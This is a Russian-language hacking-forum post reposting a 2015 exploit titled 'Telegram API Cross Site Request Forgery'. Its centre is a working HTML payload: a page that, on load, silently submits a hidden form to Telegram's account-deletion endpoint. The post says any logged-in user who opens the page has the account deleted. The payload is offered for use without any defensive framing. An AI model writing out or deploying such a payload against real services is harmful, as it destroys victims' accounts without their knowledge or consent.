1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Telegram API Cross Site Request Forgery

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем xein, 8 июл 2015.

  1. TopicStarter Overlay
    xein

    xein

    Регистрация:
    10 июн 2015
    Сообщения:
    25
    Симпатии:
    11
    Telegram API Cross Site Request Forgery

    Код:
    ********************************************************************************
    ***
    ** Exploit Title: Telegram API Cross Site Request Forgery
    **
    ** Exploit Author: C4T
    **
    ** Vendor Homepage : http://my.telegram.org
    **
    ** Google Dork: none
    **
    ** Date: 06/27/2015
    **
    ** Tested on: Windows 7
    **
    ********************************************************************************
    ****
    ** Exploit Code:
    ******************
    
    <body onload="document.exploit.submit()">
    <form name="exploit"
    action="https://my.telegram.org/deactivate/do_delete"
    id="deactivate_phone_form" onsubmit="return sendPassword(event);">
    <input type="hidden" name="message" value="ExploitedByC4T">
    </form>
    
    
    ********************************************************************************
    *****
    ** Description:
    ******************
    
    when a user is logging in telegram API just by openning a web page
    containing this exploit his account will be deleted.
    
    
    Discovered by C4T
    @ Ashiyane Digital Security Team.
    Please login or register to view links
    Please login or register to view links - инфо

    Please login or register to view links
     
    • Like Like x 2
    Метки:

Поделиться этой страницей

Загрузка...